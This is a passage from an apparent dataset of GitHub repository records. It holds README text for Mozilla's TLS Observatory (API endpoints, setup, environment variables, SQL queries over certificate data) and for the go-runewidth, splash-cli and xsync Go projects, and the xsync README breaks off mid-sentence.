ECDHE-RSA-AES128-SHA256\n - for modern level: consider enabling OCSP stapling\n - for modern level: increase priority of ECDHE-ECDSA-AES256-GCM-SHA384 over ECDHE-ECDSA-AES128-GCM-SHA256\n - for modern level: fix ciphersuite ordering, use recommended modern ciphersuite\n - oldest clients: Firefox 27, Chrome 30, IE 11 on Windows 7, Edge 1, Opera 17, Safari 9, Android 5.0, Java 8\n* Grade: A (93/100)\n```\n\nThe analysis at the end tell you what need to be changed to reach the old, intermediate or modern level. We recommend to target the intermediate level by default, and modern if you don't care about old clients.\n\n### Using the tlsobs client from Docker\n\nA docker container also exists that contains the CLI, API, Scanner and Runner.\nFetch is from `docker pull mozilla/tls-observatory`.\n\n```bash\n$ docker pull mozilla/tls-observatory\n$ docker run -it mozilla/tls-observatory tlsobs accounts.firefox.com\n```\n\n## Developing\n\nYou can use the Kubernetes configuration provided in https://github.com/mozilla/tls-observatory/tree/master/kubernetes , or alternatively, you can do the following:\n\nYou can use the `mozilla/tls-observatory` docker container for development:\n\n```bash\n$ docker pull mozilla/tls-observatory\n$ docker run -it mozilla/tls-observatory /bin/bash\nroot@05676e6789dd:~# cd $GOPATH/src/github.com/mozilla/tls-observatory\nroot@05676e6789dd:/go/src/github.com/mozilla/tls-observatory# make\n```\n\nHowever, even with the docker container, you will need to setup your own\npostgresql database. See below.\n\nTo build a development environment from scratch, you will need Go 1.15 or above.\nYou can set it up on your own machine or via the `golang:1.15` Docker\ncontainer.\n\nRetrieve a copy of the source code using `go get`, to place it directly\nunder `$GOPATH/src/github.com/mozilla/tls-observatory`, then use `make`\nto build all components.\n\n```bash\n$ docker run -it golang:1.15\n\nroot@c63f11b8852b:/go# go get github.com/mozilla/tls-observatory\npackage github.com/mozilla/tls-observatory: no buildable Go source files in /go/src/github.com/mozilla/tls-observatory\n\nroot@c63f11b8852b:/go# cd $GOPATH/src/github.com/mozilla/tls-observatory\n\nroot@c63f11b8852b:/go/src/github.com/mozilla/tls-observatory# make\n```\n\n`make` runs the tests and compiles the scanner, api, command line client\nand runner. The resulting binaries are placed under `$GOPATH/bin`.\n\n### Create the database\n\nTLS Observatory uses PostgreSQL > 9.4. To create a database, use the\nschema in `database/schema.sql`.\n\n```bash\npostgres=# create database observatory;\nCREATE DATABASE\n\npostgres=# \\c observatory\nYou are now connected to database \"observatory\" as user \"postgres\".\n\npostgres=# \\i /go/src/github.com/mozilla/tls-observatory/database/schema.sql\n```\n\nThis automatically creates all tables, indexes, users and grants to work\nwith the default configuration.\n\n### Starting the API and Scanner\n\nFirst symlink the configuration to /etc/observatory and the cipherscan\nexecutable to /opt/cipherscan, as follows:\n\n```bash\nroot@c63f11b8852b:/# ln -s $GOPATH/src/github.com/mozilla/tls-observatory/conf /etc/tls-observatory\nroot@c63f11b8852b:/# ln -s $GOPATH/src/github.com/mozilla/tls-observatory/cipherscan /opt/cipherscan\n```\n\nThen start `tlsobs-api` and `tlsobs-scanner`. The API will listen on port 8083,\non localhost (or 172.17.0.2 if you're running in Docker).\n\n### Run a scan locally\n\nTo run a scan using the local scanner, set the `-observatory` flag of the `tlsobs`\nclient to use the local API, as follows:\n\n```bash\n$ tlsobs -observatory http://172.17.0.2:8083 ulfr.io\n```\n\n### Configuration\n\n#### tlsobs-api\n\nCustomize the configuration file under `conf/api.cfg` and using the following\nenvironment variables:\n\n* `TLSOBS_API_ENABLE` set to `on` or `off` to enable or disable the API\n* `TLSOBS_POSTGRES` is the hostname or IP of the database server (eg. `mypostgresdb.example.net`)\n* `TLSOBS_POSTGRESDB` is the name of the database (eg. `observatory`)\n* `TLSOBS_POSTGRESUSER` is the database user (eg. `tlsobsapi`)\n* `TLSOBS_POSTGRESPASS` is the database user password (eg. `mysecretpassphrase`)\n\n#### tlsobs-scanner\n\nCustomize the configuration file under `conf/scanner.cfg` and using the\nfollowing environment variables:\n\n* `TLS_AWSCERTLINT_DIR` set where awslabs/certlint directory exists\n* `TLSOBS_SCANNER_ENABLE` set to `on` or `off` to enable or disable the scabber\n* `TLSOBS_POSTGRES` is the hostname or IP of the database server (eg. `mypostgresdb.example.net`)\n* `TLSOBS_POSTGRESDB` is the name of the database (eg. `observatory`)\n* `TLSOBS_POSTGRESUSER` is the database user (eg. `tlsobsscanner`)\n* `TLSOBS_POSTGRESPASS` is the database user password (eg. `mysecretpassphrase`)\n\n#### tlsobs-runner\n\nRuns regular tests against target sites and sends notifications.\n\nSee `conf/runner.yaml` for an example of configuration. Some configuration\nparameters can also be provided through environment variables:\n\n* `TLSOBS_RUNNER_SMTP_HOST` is the hostname of the smtp server (eg. `mypostfix.example.net`)\n* `TLSOBS_RUNNER_SMTP_PORT` is the port of the smtp server (eg. `587`)\n* `TLSOBS_RUNNER_SMTP_FROM` is the from address of email notifications sent by the runner (eg. `mynotification@tlsobservatory.example.net`)\n* `TLSOBS_RUNNER_SMTP_AUTH_USER` is the smtp authenticated username (eg `tlsobsrunner`)\n* `TLSOBS_RUNNER_SMTP_AUTH_PASS` is the smtp user password (eg. `mysecretpassphrase`)\n* `TLSOBS_RUNNER_SLACK_WEBHOOK` is the slack webhook (eg. `https://hooks.slack.com/services/not/a/realwebhook`)\n* `TLSOBS_RUNNER_SLACK_USERNAME` is the what the message sender's username will be (eg. `tlsbot`)\n* `TLSOBS_RUNNER_SLACK_ICONEMOJI` is the what the message sender's icon will be (eg. `:telescope:`)\n\n## API Endpoints\n\n### POST /api/v1/scan\n\nSchedule a scan of a given target.\n\n```bash\n$ curl -X POST 'https://tls-observatory.services.mozilla.com/api/v1/scan?target=ulfr.io&rescan=true'\n```\n\n**Parameters**:\n\n* `target` is the FQDN of the target site. eg. `google.com`. Do not use protocol handlers or query strings.\n* `rescan` asks for a rescan of the target when set to true.\n* `params` JSON object in which each key represents one of TLS Observatory's workers. The value under each key will be passed as the parameters to the corresponding worker. For example, `{\"ev-checker\": {\"oid\": \"foo\"}}` will pass `{\"oid\": \"foo\"}` to the ev-checker worker. The following workers accept parameters:\n * ev-checker: Expects a JSON object with the following keys:\n * oid: the oid of the EV policy to check\n * rootCertificate: the root certificate to check against, in PEM format\n\nFor example, with curl:\n\n```\ncurl -X POST \"http://localhost:8083/api/v1/scan?target=mozilla.org&rescan=true¶ms=%7B%0A%20%20%22ev-checker%22%3A%20%7B%0A%20%20%22rootcertificate%22%3A%20%22-----BEGIN%20CERTIFICATE-----%5CnMIIDxTCCAq2gAwIBAgIQAqxcJmoLQJuPC3nyrkYldzANBgkqhkiG9w0BAQUFADBs%5CnMQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3%5Cnd3cuZGlnaWNlcnQuY29tMSswKQYDVQQDEyJEaWdpQ2VydCBIaWdoIEFzc3VyYW5j%5CnZSBFViBSb290IENBMB4XDTA2MTExMDAwMDAwMFoXDTMxMTExMDAwMDAwMFowbDEL%5CnMAkGA1UEBhMCVVMxFTATBgNVBAoTDERpZ2lDZXJ0IEluYzEZMBcGA1UECxMQd3d3%5CnLmRpZ2ljZXJ0LmNvbTErMCkGA1UEAxMiRGlnaUNlcnQgSGlnaCBBc3N1cmFuY2Ug%5CnRVYgUm9vdCBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMbM5XPm%5Cn%2B9S75S0tMqbf5YE%2Fyc0lSbZxKsPVlDRnogocsF9ppkCxxLeyj9CYpKlBWTrT3JTW%5CnPNt0OKRKzE0lgvdKpVMSOO7zSW1xkX5jtqumX8OkhPhPYlG%2B%2BMXs2ziS4wblCJEM%5CnxChBVfvLWokVfnHoNb9Ncgk9vjo4UFt3MRuNs8ckRZqnrG0AFFoEt7oT61EKmEFB%5CnIk5lYYeBQVCmeVyJ3hlKV9Uu5l0cUyx%2BmM0aBhakaHPQNAQTXKFx01p8VdteZOE3%5CnhzBWBOURtCmAEvF5OYiiAhF8J2a3iLd48soKqDirCmTCv2ZdlYTBoSUeh10aUAsg%5CnEsxBu24LUTi4S8sCAwEAAaNjMGEwDgYDVR0PAQH%2FBAQDAgGGMA8GA1UdEwEB%2FwQF%5CnMAMBAf8wHQYDVR0OBBYEFLE%2Bw2kD%2BL9HAdSYJhoIAu9jZCvDMB8GA1UdIwQYMBaA%5CnFLE%2Bw2kD%2BL9HAdSYJhoIAu9jZCvDMA0GCSqGSIb3DQEBBQUAA4IBAQAcGgaX3Nec%5CnnzyIZgYIVyHbIUf4KmeqvxgydkAQV8GK83rZEWWONfqe%2FEW1ntlMMUu4kehDLI6z%5CneM7b41N5cdblIZQB2lWHmiRk9opmzN6cN82oNLFpmyPInngiK3BD41VHMWEZ71jF%5CnhS9OMPagMRYjyOfiZRYzy78aG6A9%2BMpeizGLYAiJLQwGXFK3xPkKmNEVX58Svnw2%5CnYzi9RKR%2F5CYrCsSXaQ3pjOLAEFe4yHYSkVXySGnYvCoCWw9E1CAx2%2FS6cCZdkGCe%5CnvEsXCS%2B0yx5DaMkHJ8HSXPfqIbloEpw8nL%2Be%2FIBcm2PN7EeqJSdnoDfzAIJ9VNep%5Cn%2BOkuE6N36B9K%5Cn-----END%20CERTIFICATE-----%22%2C%0A%20%20%22oid%22%3A%20%222.16.840.1.114412.22.1%22%0A%7D%0A%7D\"\n```\n\n**Output**: a `json` document containing the Scan ID.\n\n**Caching**: When `rescan` is not `true`, if a scan of the target was done over the last 24 hours, the scan ID is returned. Use `rescan=true` to force a rescan within 24 hours of the previous scan.\n\n**Rate Limits**: Each target can only be scanned every 3 minutes with `rescan=true`.\n\n### GET /api/v1/results\n\nRetrieve scan results by its ID.\n\n```bash\ncurl https://tls-observatory.services.mozilla.com/api/v1/results?id=12302333\n```\n\n**Parameters**:\n\n* `id` is the Scan ID\n\n**Output**: a `json` document containing the scan results and the ID of the end-entity certificate.\n\n### GET /api/v1/certificate\n\nRetrieve a certificate by its ID.\n\n```bash\ncurl https://tls-observatory.services.mozilla.com/api/v1/certificate?id=1\n```\n\n**Parameters**:\n\n* `id` is the Certificate ID\n* `sha256` the hexadecimal checksum of the DER certificate (only if `id` is not\n provided)\n\n**Output**: a `json` document containing the parsed certificate and its raw X509 version encoded with base64.\n\n### POST /api/v1/certificate\n\nPublish a certificate.\n\n```bash\ncurl -X POST -F certificate=@example.pem https://tls-observatory.services.mozilla.com/api/v1/certificate\n```\n\n**Parameters**:\n\n* `certificate` is a POST multipart/form-data parameter that contains the PEM encoded certificate.\n\n**Output**: a `json` document containing the parsed certificate and its raw X509 version encoded with base64.\n\n**Caching**: Certificates are only stored once. The database uses the SHA256 hash of the DER (binary) certificate to identify duplicates. Posting a certificate already stored in database returns the stored version.\n\n### GET /api/v1/paths\n\nRetrieve the paths from a certificate to one of multiple roots.\n\n```bash\ncurl https://tls-observatory.services.mozilla.com/api/v1/paths?id=1\n```\n\n**Parameters**:\n\n* `id` is the ID of the certificate to start the path at.\n* `sha256` the hexadecimal checksum of the DER certificate (only if `id` is not\n provided)\n\n**Output**: a `json` document containing the paths document. Each entry in the path contains the current certificate and an array of parents, if any exist.\n\n### GET /api/v1/truststore\n\nRetrieve all the certificates in a given truststore.\n\n```bash\ncurl https://tls-observatory.services.mozilla.com/api/v1/truststore?store=mozilla&format=pem\n```\n\n**Parameters**:\n\n* `store` is the store to retrieve certificates from. \"mozilla\", \"android\", \"apple\", \"microsoft\" and \"ubuntu\" are allowed.\n* `format`, either \"pem\" or \"json\".\n\n**Output**: if `format` is pem, a series of PEM-format certificates. If `format` is json, a json array of certificate objects, each with the same format of `/api/v1/certificate`.\n\n### GET /api/v1/issuereecount\n\nRetrieve the count of end-entity certificates that chain to the specified certificate. This is used to evaluate weight of a given issuer in the web pki.\n\n```bash\ncurl https://tls-observatory.services.mozilla.com/api/v1/issuereecount?id=1\n```\n\n**Parameters**:\n\n* `id` is the ID of the certificate to start the path at.\n* `sha256` the hexadecimal checksum of the DER certificate (only if `id` is not\n provided)\n\n**Output**: a `json` document containing the certificate itself under `issuer` and the count of end-entity certs under `eecount`.\n\n\n### GET /api/v1/__heartbeat__\n\nReturns a 200 OK.\n\n```bash\ncurl https://tls-observatory.services.mozilla.com/api/v1/__heartbeat__\nI iz alive.\n```\n\n### GET /api/v1/__stats__\n\nReturns usage statistics in json (default) or text format.\n\nBy default, this endpoint returns stale data, refreshed the last time the\nendpoint was called, so it's possible to not have the latest available\nstatistics. Use the query parameter `details=full` to get the real-time stats,\nbut be aware that this is expensive and often times out.\n\n```bash\ncurl https://tls-observatory.services.mozilla.com/api/v1/__stats__?format=text&details=full\n\npending scans: 7\n\nlast 24 hours\n-------------\n- distinct targets: 21873\n- certs seen: 16459\n- certs added: 7886\n\nhourly scans\n------------\n2017-02-08T15:00:00Z 5\n2017-02-08T14:00:00Z 64\n2017-02-08T13:00:00Z 928\n2017-02-08T12:00:00Z 1969\n2017-02-08T11:00:00Z 1957\n2017-02-08T10:00:00Z 1982\n2017-02-08T09:00:00Z 2013\n2017-02-08T08:00:00Z 2031\n2017-02-08T07:00:00Z 2153\n2017-02-08T06:00:00Z 1860\n2017-02-08T05:00:00Z 1869\n2017-02-08T04:00:00Z 1944\n2017-02-08T03:00:00Z 1959\n2017-02-08T02:00:00Z 907\n2017-02-08T01:00:00Z 32\n2017-02-08T00:00:00Z 55\n2017-02-07T23:00:00Z 41\n2017-02-07T22:00:00Z 46\n2017-02-07T21:00:00Z 60\n2017-02-07T20:00:00Z 76\n2017-02-07T19:00:00Z 66\n2017-02-07T18:00:00Z 67\n2017-02-07T17:00:00Z 56\n```\n\n## Database Queries\n\n### Find certificates signed by CAs identified by their SHA256 fingerprint\n\n```sql\nSELECT certificates.id, certificates.subject, certificates.issuer\nFROM certificates INNER JOIN trust ON (certificates.id=trust.cert_id)\nWHERE trust.issuer_id in (\n SELECT id FROM certificates\n WHERE sha256_fingerprint IN (\n 'E7685634EFACF69ACE939A6B255B7B4FABEF42935B50A265ACB5CB6027E44E70',\n 'A4B6B3996FC2F306B3FD8681BD63413D8C5009CC4FA329C2CCF0E2FA1B140305'\n ))\nAND certificates.is_ca='false';\n```\n\n### List signature algorithms of trusted certs\n\n```sql\nSELECT signature_algo, count(*)\nFROM certificates INNER JOIN trust ON (certificates.id=trust.cert_id)\nWHERE is_ca='false'\nAND trust.trusted_mozilla='true'\nGROUP BY signature_algo\nORDER BY count(*) DESC;\n```\n\n### Show expiration dates of trusted SHA-1 certificates\n\n```sql\nSELECT extract('year' FROM date_trunc('year', not_valid_after)) as expiration_year,\n extract('month' FROM date_trunc('month', not_valid_after)) as expiration_month,\n count(*)\nFROM certificates\n INNER JOIN trust ON (certificates.id=trust.cert_id)\nWHERE is_ca='false'\n AND trust.trusted_mozilla='true'\n AND signature_algo='SHA1WithRSA'\nGROUP BY date_trunc('year', not_valid_after),\n date_trunc('month', not_valid_after)\nORDER BY date_trunc('year', not_valid_after) ASC,\n date_trunc('month', not_valid_after) ASC;\n```\n\n### Count trusted SHA-1 certs seen over the last month on TOP1M sites\n\n```sql\nSELECT distinct(certificates.id) as \"id\", cisco_umbrella_rank, domains, not_valid_before, not_valid_after, last_seen, signature_algo\nFROM certificates\n INNER JOIN trust ON (certificates.id=trust.cert_id)\nWHERE is_ca='false'\n AND trust.trusted_mozilla='true'\n AND signature_algo='SHA1WithRSA'\n AND cisco_umbrella_rank < 1000000\n AND last_seen > NOW() - INTERVAL '1 month'\n AND not_valid_after > NOW()\nORDER BY cisco_umbrella_rank ASC;\n```\n\n### List issuer, subject and SAN of Mozilla|Firefox certs not issued by Digicert\n\n```sql\nSELECT certificates.id,\n issuer->'o'->>0 AS Issuer,\n subject->>'cn' AS Subject,\n san AS SubjectAltName\nFROM certificates\n INNER JOIN trust ON (trust.cert_id=certificates.id),\n jsonb_array_elements_text(x509_subjectAltName) AS san\nWHERE jsonb_typeof(x509_subjectAltName) != 'null'\n AND ( subject#>>'{cn}' ~ '\\.(firefox|mozilla)\\.'\n OR\n san ~ '\\.(firefox|mozilla)\\.'\n )\n AND trust.trusted_mozilla='true'\n AND certificates.not_valid_after>now()\n AND cast(issuer#>>'{o}' AS text) NOT LIKE '%DigiCert Inc%'\nGROUP BY certificates.id, san\nORDER BY certificates.id ASC;\n```\n\n### Find count of targets that support the SEED-SHA ciphersuite\n\n```sql\nSELECT COUNT(DISTINCT(target))\nFROM scans, jsonb_array_elements(conn_info->'ciphersuite') as ciphersuites\nWHERE jsonb_typeof(conn_info) != 'null'\nAND ciphersuites->>'cipher'='SEED-SHA';\n```\n\n### Find intermediate CA certs whose root is trusted by Mozilla\n\n```sql\nSELECT id, subject\nFROM certificates\nWHERE is_ca=True\n AND subject!=issuer\n AND issuer IN (\n SELECT subject\n FROM certificates\n WHERE in_mozilla_root_store=True\n )\nGROUP BY subject, sha256_fingerprint;\n```\n\n### Find CA certs treated as EV in Firefox\n\nThe list is CA Certs that get EV treatment in Firefox can be [found here](https://dxr.mozilla.org/mozilla-central/source/security/certverifier/ExtendedValidation.cpp).\n\n```sql\nSELECT id, subject\nFROM certificates,\n jsonb_array_elements_text(x509_certificatePolicies) AS cpol\nWHERE jsonb_typeof(x509_certificatePolicies) != 'null'\n AND cpol IN ('1.2.392.200091.100.721.1','1.2.616.1.113527.2.5.1.1','1.3.159.1.17.1',\n '1.3.6.1.4.1.13177.10.1.3.10','1.3.6.1.4.1.13769.666.666.666.1.500.9.1',\n '1.3.6.1.4.1.14370.1.6','1.3.6.1.4.1.14777.6.1.1','1.3.6.1.4.1.14777.6.1.2',\n '1.3.6.1.4.1.17326.10.14.2.1.2','1.3.6.1.4.1.17326.10.8.12.1.2',\n '1.3.6.1.4.1.22234.2.14.3.11','1.3.6.1.4.1.22234.2.5.2.3.1',\n '1.3.6.1.4.1.22234.3.5.3.1','1.3.6.1.4.1.22234.3.5.3.2','1.3.6.1.4.1.23223.1.1.1',\n '1.3.6.1.4.1.29836.1.10','1.3.6.1.4.1.34697.2.1','1.3.6.1.4.1.34697.2.2',\n '1.3.6.1.4.1.34697.2.3','1.3.6.1.4.1.34697.2.4','1.3.6.1.4.1.36305.2',\n '1.3.6.1.4.1.40869.1.1.22.3','1.3.6.1.4.1.4146.1.1','1.3.6.1.4.1.4788.2.202.1',\n '1.3.6.1.4.1.6334.1.100.1','1.3.6.1.4.1.6449.1.2.1.5.1','1.3.6.1.4.1.782.1.2.1.8.1',\n '1.3.6.1.4.1.7879.13.24.1','1.3.6.1.4.1.8024.0.2.100.1.2','2.16.156.112554.3',\n '2.16.528.1.1003.1.2.7','2.16.578.1.26.1.3.3','2.16.756.1.83.21.0',\n '2.16.756.1.89.1.2.1.1','2.16.756.5.14.7.4.8','2.16.792.3.0.3.1.1.5',\n '2.16.792.3.0.4.1.1.4','2.16.840.1.113733.1.7.23.6','2.16.840.1.113733.1.7.48.1',\n '2.16.840.1.114028.10.1.2','2.16.840.1.114404.1.1.2.4.1','2.16.840.1.114412.2.1',\n '2.16.840.1.114413.1.7.23.3','2.16.840.1.114414.1.7.23.3')\n AND is_ca='true';\n```\n\n### Evaluate the quality of TLS configurations of top sites\n\nThis query uses the top1m ranking analyzer to retrieve the Mozilla evaluation of top sites.\n\n```sql\nobservatory=> SELECT COUNT(DISTINCT(target)), output->>'level' AS \"Mozilla Configuration\"\nFROM scans\n INNER JOIN analysis ON (scans.id=analysis.scan_id)\nWHERE has_tls=true\n AND target IN ( SELECT target\n FROM scans\n INNER JOIN analysis ON (scans.id=analysis.scan_id)\n WHERE worker_name='top1m'\n AND CAST(output->'target'->>'rank' AS INTEGER) < 10000\n AND timestamp > NOW() - INTERVAL '1 month')\n AND worker_name='mozillaEvaluationWorker'\n AND timestamp > NOW() - INTERVAL '1 month'\nGROUP BY has_tls, output->>'level'\nORDER BY COUNT(DISTINCT(target)) DESC;\n\n count | Mozilla Configuration\n-------+-----------------------\n 3689 | intermediate\n 1906 | non compliant\n 1570 | bad\n 15 | old\n(4 rows)\n\n```\n\n### Count Top 1M sites that support RC4\n```sql\nSELECT COUNT(DISTINCT(target))\nFROM scans,\n jsonb_array_elements(conn_info->'ciphersuite') as ciphersuites\nWHERE jsonb_typeof(conn_info) = 'object'\n AND jsonb_typeof(conn_info->'ciphersuite') = 'array'\n AND ciphersuites->>'cipher' LIKE 'RC4-%'\n AND target IN ( SELECT target\n FROM scans\n INNER JOIN analysis ON (scans.id=analysis.scan_id)\n WHERE worker_name='top1m'\n AND CAST(output->'target'->>'rank' AS INTEGER) < 1000000\n AND timestamp > NOW() - INTERVAL '1 month')\n AND timestamp > NOW() - INTERVAL '1 month';\n ```\n\n### Count Top 1M sites that support TLSv1.2\n```sql\nSELECT ciphersuites->'protocols' @> '[\"TLSv1.2\"]'::jsonb AS \"Support TLS 1.2\", COUNT(DISTINCT(target))\nFROM scans,\n jsonb_array_elements(conn_info->'ciphersuite') as ciphersuites\nWHERE jsonb_typeof(conn_info) = 'object'\n AND jsonb_typeof(conn_info->'ciphersuite') = 'array'\n AND target IN ( SELECT target\n FROM scans\n INNER JOIN analysis ON (scans.id=analysis.scan_id)\n WHERE worker_name='top1m'\n AND CAST(output->'target'->>'rank' AS INTEGER) < 1000000\n AND timestamp > NOW() - INTERVAL '1 month')\n AND timestamp > NOW() - INTERVAL '1 month'\nGROUP BY ciphersuites->'protocols' @> '[\"TLSv1.2\"]'::jsonb;\n```\n\n### Count end-entity certificates by issuer organizations\n```sql\nSELECT COUNT(*), issuer#>'{o}'->>0\nFROM certificates\n INNER JOIN trust ON (certificates.id=trust.cert_id)\nWHERE certificates.is_ca = false\n AND trust.trusted_mozilla=true\n AND trust.is_current = true\nGROUP BY issuer#>'{o}'->>0\nORDER BY count(*) DESC;\n```\n\n### Count sites in the top 10k that are impacted by the Symantec distrust in Firefox 60\nnote: in Firefox 63, the not_valid_before condition will be removed\n```sql\nSELECT COUNT(DISTINCT(target))\nFROM scans\n INNER JOIN analysis ON (scans.id=analysis.scan_id)\n INNER JOIN certificates ON (scans.cert_id=certificates.id)\nWHERE has_tls=true\n AND target IN ( SELECT target\n FROM scans\n INNER JOIN analysis ON (scans.id=analysis.scan_id)\n WHERE worker_name='top1m'\n AND CAST(output->'target'->>'rank' AS INTEGER) < 10000\n AND timestamp > NOW() - INTERVAL '1 week')\n AND worker_name='symantecDistrust'\n AND timestamp > NOW() - INTERVAL '1 week'\n AND not_valid_before < '2016-06-01'\nGROUP BY has_tls, output->>'isDistrusted'\nORDER BY COUNT(DISTINCT(target)) DESC;\n```\n\n## Contributing\n\nWe're always happy to help new contributors. You can find us in `#observatory` on `irc.mozilla.org` ([Mozilla Wiki](https://wiki.mozilla.org/IRC)).\n\n### Dependencies\n\nWe currently vendor dependencies in `vendor/`.\n\nUsing a golang version with [`go mod`](https://golang.org/ref/mod#mod-commands),run `make vendor` update vendored dependencies.\n\n## Contributors\n\n * Julien Vehent\n * Dimitris Bachtis (original dev)\n * Adrian Utrilla\n\n## License\n\n * Mozilla Public License Version 2.0\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mattn/go-runewidth", "link": "https://github.com/mattn/go-runewidth", "tags": ["golang", "go", "windows", "wcwidth"], "stars": 511, "description": "wcwidth for golang", "lang": "Go", "repo_lang": "", "readme": "go-runewidth\n============\n\n[![Build Status](https://github.com/mattn/go-runewidth/workflows/test/badge.svg?branch=master)](https://github.com/mattn/go-runewidth/actions?query=workflow%3Atest)\n[![Codecov](https://codecov.io/gh/mattn/go-runewidth/branch/master/graph/badge.svg)](https://codecov.io/gh/mattn/go-runewidth)\n[![GoDoc](https://godoc.org/github.com/mattn/go-runewidth?status.svg)](http://godoc.org/github.com/mattn/go-runewidth)\n[![Go Report Card](https://goreportcard.com/badge/github.com/mattn/go-runewidth)](https://goreportcard.com/report/github.com/mattn/go-runewidth)\n\nProvides functions to get fixed width of the character or string.\n\nUsage\n-----\n\n```go\nrunewidth.StringWidth(\"\u3064\u306e\u3060\u2606HIRO\") == 12\n```\n\n\nAuthor\n------\n\nYasuhiro Matsumoto\n\nLicense\n-------\n\nunder the MIT License: http://mattn.mit-license.org/2013\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "splash-cli/splash-cli", "link": "https://github.com/splash-cli/splash-cli", "tags": ["wallpaper", "beautiful-photos", "unsplash", "photography", "photos", "cli", "beautiful-wallpapers", "splash", "download-photos", "change-wallpaper", "wallpapers"], "stars": 511, "description": "A simple, CLI to download Unsplash wallpapers. Nothing fancy \u2014 it just works.", "lang": "Go", "repo_lang": "", "readme": "# Splash CLI v4\n[![Go](https://github.com/splash-cli/splash-cli/actions/workflows/go.yml/badge.svg?branch=go-rewrite)](https://github.com/splash-cli/splash-cli/actions/workflows/go.yml)\n> Are you looking for the v3.x `splash-cli`? Check out the [master](https://github.com/splash-cli/splash-cli/tree/master) branch\n\n\n\t\n![splash-cli](https://socialify.git.ci/splash-cli/splash-cli/image?description=1&language=1&owner=1&pattern=Brick%20Wall&theme=Dark)\t\n\n\n

\n \n \"Website\"\n \n\t\n\t\t\"Buy\n\t\n

\n

\n\t\n\t\t\"stars_spark\"\n\t\n

\n\n
Get stunning wallpapers from Unsplash
\n
\n\n\nA new era for Splash CLI is coming! After many weeks\nthinking how to upgrade the project codebase I decided to\ncompletely rewrite the CLI from the ground in Go.\n\nThe idea is to replicate the original functionality to keep\nthe new experience as close to the original as possible.\n\n### Why Go?\n- Distribution will not depend on NPM\n- No need to install any dependencies\n- Lighter bundle size\n- No need to use any build tools\n- Blazing fast (~2500%) (0.22s vs 5s)\n\n### Feature List\n- [x] Change wallpaper on your desktop\n- [x] Download photos\n- [x] Login to your account\n- [ ] Create new collections\n- [ ] Add photos to collections\n- [ ] Like photos\n- More to come\n\n### Build Locally\nTo build the project locally you can use the following command:\n\n```shell\n goreleaser --snapshot --rm-dist\n```\n\nBe sure to set up your environment before running the command.\nRequired environment variables are:\n - `UNSPLASH_CLIENT_ID`\n - `UNSPLASH_CLIENT_SECRET`\n\nYou can get credentials on the [Unsplash Developer Portal](https://unsplash.com/developers).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "puzpuzpuz/xsync", "link": "https://github.com/puzpuzpuz/xsync", "tags": [], "stars": 510, "description": "Concurrent data structures for Go", "lang": "Go", "repo_lang": "", "readme": "[![GoDoc reference](https://img.shields.io/badge/godoc-reference-blue.svg)](https://pkg.go.dev/github.com/puzpuzpuz/xsync/v2)\n[![GoReport](https://goreportcard.com/badge/github.com/puzpuzpuz/xsync/v2)](https://goreportcard.com/report/github.com/puzpuzpuz/xsync/v2)\n[![codecov](https://codecov.io/gh/puzpuzpuz/xsync/branch/main/graph/badge.svg)](https://codecov.io/gh/puzpuzpuz/xsync)\n\n# xsync\n\nConcurrent data structures for Go. Aims to provide more scalable alternatives for some of the data structures from the standard `sync` package, but not only.\n\n### Benchmarks\n\nBenchmark results may be found [here](BENCHMARKS.md).\n\n## Counter\n\nA `Counter` is a striped `int64` counter inspired by the `j.u.c.a.LongAdder` class from Java standard library.\n\n```go\nc := xsync.NewCounter()\n// increment and decrement the counter\nc.Inc()\nc.Dec()\n// read the current value \nv := c.Value()\n```\n\nWorks better in comparison with a single atomically updated `int64` counter in high contention scenarios.\n\n## Map\n\nA `Map` is like a concurrent hash table based map. It follows the interface of `sync.Map` with a number of valuable extensions like `Compute` or `Size`.\n\n```go\nm := xsync.NewMap()\nm.Store(\"foo\", \"bar\")\nv, ok := m.Load(\"foo\")\ns := m.Size()\n```\n\n`Map` uses a modified version of Cache-Line Hash Table (CLHT) data structure: https://github.com/LPD-EPFL/CLHT\n\nCLHT is built around idea to organize the hash table in cache-line-sized buckets, so that on all modern CPUs update operations complete with minimal cache-line transfer. Also, `Get` operations are obstruction-free and involve no writes to shared memory, hence no mutexes or any other sort of locks. Due to this design, in all considered scenarios `Map` outperforms `sync.Map`.\n\nOne important difference with `sync.Map` is that only string keys are supported. That's because Golang standard library does not expose the built-in hash functions for `interface{}` values.\n\n`MapOf[K, V]` is an implementation with parametrized value type. It is available for Go 1.18 or later. While it's still a CLHT-inspired hash map, `MapOf`'s design is quite different from `Map`. As a result, less GC pressure and less atomic operations on reads.\n\n```go\nm := xsync.NewMapOf[string]()\nm.Store(\"foo\", \"bar\")\nv, ok := m.Load(\"foo\")\n```\n\nOne important difference with `Map` is that `MapOf` supports arbitrary `comparable` key types:\n\n```go\ntype Point struct {\n\tx int32\n\ty int32\n}\nm := NewTypedMapOf[Point, int](func(seed maphash.Seed, p Point) uint64 {\n\t// provide a hash function when creating the MapOf;\n\t// we recommend using the hash/maphash package for the function\n\tvar h maphash.Hash\n\th.SetSeed(seed)\n\tbinary.Write(&h, binary.LittleEndian, p.x)\n\thash := h.Sum64()\n\th.Reset()\n\tbinary.Write(&h, binary.LittleEndian, p.y)\n\treturn 31*hash + h.Sum64()\n})\nm.Store(Point{42, 42}, 42)\nv, ok := m.Load(point{42, 42})\n```\n\n## MPMCQueue\n\nA `MPMCQeueue` is a bounded multi-producer multi-consumer concurrent queue.\n\n```go\nq := xsync.NewMPMCQueue(1024)\n// producer inserts an item into the queue\nq.Enqueue(\"foo\")\n// optimistic insertion attempt; doesn't block\ninserted := q.TryEnqueue(\"bar\")\n// consumer obtains an item from the queue\nitem := q.Dequeue()\n// optimistic obtain attempt; doesn't block\nitem, ok := q.TryDequeue()\n```\n\nBased on the algorithm from the [MPMCQueue](https://github.com/rigtorp/MPMCQueue) C++ library which in its turn references D.Vyukov's [MPMC queue](https://www.1024cores.net/home/lock-free-algorithms/queues/bounded-mpmc-queue). According to the following [classification](https://www.1024cores.net/home/lock-free-algorithms/queues), the queue is array-based, fails 